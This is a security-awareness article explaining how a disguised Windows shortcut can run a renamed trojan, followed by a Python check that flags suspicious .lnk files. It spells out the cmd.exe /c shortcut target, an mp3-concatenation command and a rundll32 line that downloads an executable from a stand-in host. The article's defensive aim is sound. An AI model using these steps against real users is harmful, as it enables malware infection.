The shortcut virus

Have you ever wondered how powerful a shortcut is? Or whether computer viruses can be spread via shortcuts? No, this article is not about viruses that play with the shortcuts on your desktop, making them run away when you try to click one and driving you crazy; this article is about simple shortcuts. For example, somebody sends you as an email attachment, or you download from somewhere, a folder with two files in it: a text file and a shortcut to the text file. What do you think? I mean something like this:

[Image: shortcuts.jpg]

The first impulse is to double-click the file entitled “VERY IMPORTANT, read this.txt”. It has a text file extension and icon, but the little arrow in the corner indicates that it is a shortcut and not a text file. Even if we realize it’s a shortcut, the general tendency is to open it because the title is eye-catching, even though there is no logic in a shortcut to a text file being offered over the Internet. A shortcut to what file?

Everybody creates shortcuts locally on their own computer and does not offer them for download, unless it is an Internet Explorer shortcut with a URL embedded in it. So where is the danger of a virus infection in a shortcut to a text file, you will ask.

First, look at this shortcut's properties:

[Image: shortcuts_properties]

The shortcut properties are set as above:

  • Target : %windir%/system32/cmd.exe /c readme.txt -> this is the most important one: it forces the command prompt (cmd.exe) to run the “readme.txt” file as an executable, regardless of its text file extension
  • Start in : %currentdir% -> this makes the shortcut look for the file “readme.txt” in the folder where the shortcut itself is located
  • Run : minimized -> this makes the whole process invisible to the user, with no window shown

Now it all becomes clear: by changing the extension of a trojan, for example, from “exe” to “txt”, the file appears harmless to the user. Obviously any extension can be used for the virus, such as .jpg or .mp3; the command prompt will run the virus as an executable, resulting in the infection of the computer. This method of spreading virus infections is rather old, but it still tricks users and even some antivirus programs, which do not see any threat in a jpg (image) or txt (text) file and do not trigger any virus alert when scanning files; they simply detect nothing!

Some extra notes are needed about .mp3 (music) files. There are reports that “dirty” mp3 files can even be played in normal music players like Winamp or VLC. The virus file is concatenated with an mp3 (music) file at the command prompt:

  • copy /b trojan.exe + song.mp3 final_song.mp3

and, using a shortcut like the one above, the virus will be executed. At the same time, because of the way music players work, they will ignore the other code, find the first valid frame and play it. Read here for deeper details.

For example, changing the shortcut's Target property to:

  • Target : %windir%\system32\rundll32.exe url.dll,FileProtocolHandler http://bad_site.com/some_file.exe

will start the default browser and offer the file some_file.exe for download, which can be any backdoor, trojan or virus, tricking the user into downloading and running it.
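A defender's check for the shortcut properties described above, added here as an example and not part of the original article: it reads a .lnk file's show command and string fields following the public MS-SHLLINK layout and flags a cmd.exe or rundll32.exe target, a /c or URL argument, and a minimized window. The function names and the `build_sample` input are constructed for illustration, and only the StringData section is inspected, so a target stored solely in the shortcut's ID list is not seen.

```python
import struct

LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]
SW_SHOWMINNOACTIVE = 7  # "Run: Minimized" in the Properties dialog

def parse_lnk(data):
    """Return the show command and StringData fields (MS-SHLLINK layout)."""
    if len(data) < 76 or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LINK_CLSID:
        raise ValueError("not a shell link")
    flags, = struct.unpack_from("<I", data, 20)
    info = {"show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = 76
    if flags & HAS_IDLIST:      # skip LinkTargetIDList (2-byte size prefix)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:    # skip LinkInfo (4-byte size includes itself)
        pos += struct.unpack_from("<I", data, pos)[0]
    wide = bool(flags & IS_UNICODE)
    for bit, name in STRING_FIELDS:
        if flags & bit:
            count, = struct.unpack_from("<H", data, pos)  # length in characters
            size = count * 2 if wide else count
            raw = data[pos + 2:pos + 2 + size]
            info[name] = raw.decode("utf-16-le" if wide else "cp1252", "replace")
            pos += 2 + size
    return info

def findings(info):
    """Flag the traits the article describes; heuristics, not a verdict."""
    target = info.get("relative_path", "").lower()
    args = info.get("arguments", "").lower()
    out = []
    if target.endswith(("cmd.exe", "rundll32.exe")):
        out.append("target is a command interpreter or DLL launcher")
    if target.endswith("cmd.exe") and "/c " in args + " ":
        out.append("arguments pass a command to run (/c)")
    if "fileprotocolhandler" in args or "http://" in args or "https://" in args:
        out.append("arguments open a URL")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        out.append("window starts minimized")
    return out

def build_sample(target, arguments, show):
    """Constructed test input: header plus two StringData fields only."""
    head = struct.pack("<I16sI36xI12x", 76, LINK_CLSID, 0x08 | 0x20 | IS_UNICODE, show)
    strings = (struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (target, arguments))
    return head + b"".join(strings)
```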

If in the future you pay more attention to shortcuts, especially shortcuts provided by others, then this article has met its goal.

Computer shortcuts can be as dangerous as viruses; more than that, they can be part of a computer virus.

Keep safe!
